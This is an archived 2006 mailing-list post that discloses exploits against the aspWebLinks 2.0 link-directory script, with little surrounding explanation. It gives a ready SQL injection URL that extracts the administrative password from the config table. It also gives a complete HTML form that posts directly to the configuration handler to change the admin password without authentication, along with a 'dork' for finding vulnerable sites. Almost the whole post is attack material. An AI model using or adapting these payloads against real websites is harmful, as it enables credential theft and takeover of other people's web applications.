Network Security: Detailed info on aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change Exploit

Subject:	aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change Exploit
Date:	2 Jun 2006 07:15:21 -0000

<!--
# Title  :   aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL 
Injection
# Author :   ajann
# Dork   :   aspWebLinks 2.0

SQL INJECTION:
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config
-->


<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>
<form method='POST' action='links.asp?action=modifyconfigprocess'><input 
type='hidden' name='txtConfigID' value='1'><input type='hidden' 
name='txtSkinName' value='default'><table border='0' width='100%' 
cellspacing='0' cellpadding='3'><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative 
Password:</b></font></td><td width='70%'><input type='text' 
name='txtAdministrativePassword' size='43' 
value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days 
New:</b></font></td><td width='70%'><input type='text' 
name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input 
type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td 
width='30%' align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Links Per Page:</b></font></td><td width='70%'><input 
type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td 
width='30%' align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Category Header:</b></font></td><td width='70%'><input 
type='text' name='txtCategoryHeader' size='43' value='<b>Select A 
Category:</b>'></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Category 
Columns:</b></font></td><td width='70%'><input type='text' 
name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub 
Category Header:</b></font></td><td width='70%'><input type='text' 
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick 
or ADD your link:'></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category 
Description:</b></font></td><td width='70%'><input type='radio' value='YES' 
name='txtShowCatDescription' checked >YES<input type='radio' value='NO' 
name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on 
home page:</b></font></td><td width='70%'><input type='radio' value='YES' 
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO' 
name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New 
items on home page:</b></font></td><td width='70%'><input type='text' 
name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Show Whats Hot on home page:</b></font></td><td 
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked

YES<input type='radio' value='NO' name='txtShowWhatsHot' 
NO</td></tr><tr><td width='30%' align='right' valign='top'><font

face="Tahoma" size="1" color="black"><b>Require approval for link and review 
additions:</b></font></td><td width='70%'><input type='radio' value='YES' 
name='txtNeedApproval' checked >YES<input type='radio' value='NO' 
name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot 
items on home page:</b></font></td><td width='70%'><input type='text' 
name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Whats New Header:</b></font></td><td width='70%'><input 
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats 
New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font 
face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td 
width='70%'><input type='text' name='txtWhatsHotHeader' size='43' 
value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links 
By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option 
selected value='ALPHA'>Alphabetically</option><option  value='DATE'>Date 
Added</option><option  value='HITS'>Number of 
Visits</option></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" 
color="black"><b></b></font></td><td width='70%'><input type='submit' 
value='Update Configuration' name='B1'></td></tr></table></form>

<Prev in Thread]	Current Thread	[Next in Thread>
aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change Exploit, ajannhwt <=

Previous by Date:	New Snort Bypass - Patch - Bypass of Patch, Sigint Consulting
Next by Date:	[Full-disclosure] rPSA-2006-0091-1 firefox thunderbird, Justin M. Forbes
Previous by Thread:	New Snort Bypass - Patch - Bypass of Patch, Sigint Consulting
Next by Thread:	[Full-disclosure] rPSA-2006-0091-1 firefox thunderbird, Justin M. Forbes
Indexes:	[Date] [Thread] [Top] [All Lists]